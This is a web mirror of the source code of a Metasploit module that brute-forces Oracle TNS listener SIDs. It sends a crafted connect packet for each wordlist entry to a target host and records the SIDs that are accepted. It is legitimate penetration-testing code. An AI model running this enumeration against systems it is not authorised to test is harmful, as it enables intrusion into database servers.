CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/oracle/sid_brute.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Report

8
  include Msf::Exploit::Remote::TNS

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'Oracle TNS Listener SID Brute Forcer',

13
      'Description'    => %q{

14
        This module simply attempts to discover the protected SID.

15
      },

16
      'Author'         => [ 'MC' ],

17
      'License'        => MSF_LICENSE,

18
      'References'     =>

19
        [

20
          [ 'URL', 'https://www.metasploit.com/users/mc' ],

21
          [ 'URL' , 'http://www.red-database-security.com/scripts/sid.txt' ],

22
        ],

23
      'DisclosureDate' => '2009-01-07'))

24


25
    register_options(

26
      [

27
        Opt::RPORT(1521),

28
        OptString.new('SLEEP', [ false,   'Sleep() amount between each request.', '1']),

29
        OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),

30
      ])

31


32
  end

33


34
  def run

35


36
    s    = datastore['SLEEP']

37
    list = datastore['SIDFILE']

38


39
    print_status("Starting brute force on #{rhost}, using sids from #{list}...")

40


41
    fd = ::File.open(list, 'rb').each do |sid|

42
      login = "(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=MSF)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{rhost})(PORT=#{rport})))"

43
      pkt = tns_packet(login)

44


45
      begin

46
        connect

47
      rescue ::Interrupt

48
        raise $!

49
      rescue => e

50
        print_error(e.to_s)

51
        disconnect

52
        return

53
      end

54


55
      sock.put(pkt)

56
      select(nil,nil,nil,s.to_i)

57
      res = sock.get_once

58
      disconnect

59


60
      if res and res.to_s !~ /ERROR_STACK/

61
        report_note(

62
          :host => rhost,

63
          :port => rport,

64
          :type => 'oracle_sid',

65
          :data => "PORT=#{rport}, SID=#{sid.strip}",

66
          :update => :unique_data

67
        )

68
        print_good("#{rhost}:#{rport} Found SID '#{sid.strip}'")

69
      end

70


71
    end

72


73
    print_status("Done with brute force...")

74
    fd.close

75


76
  end

77
end

78


79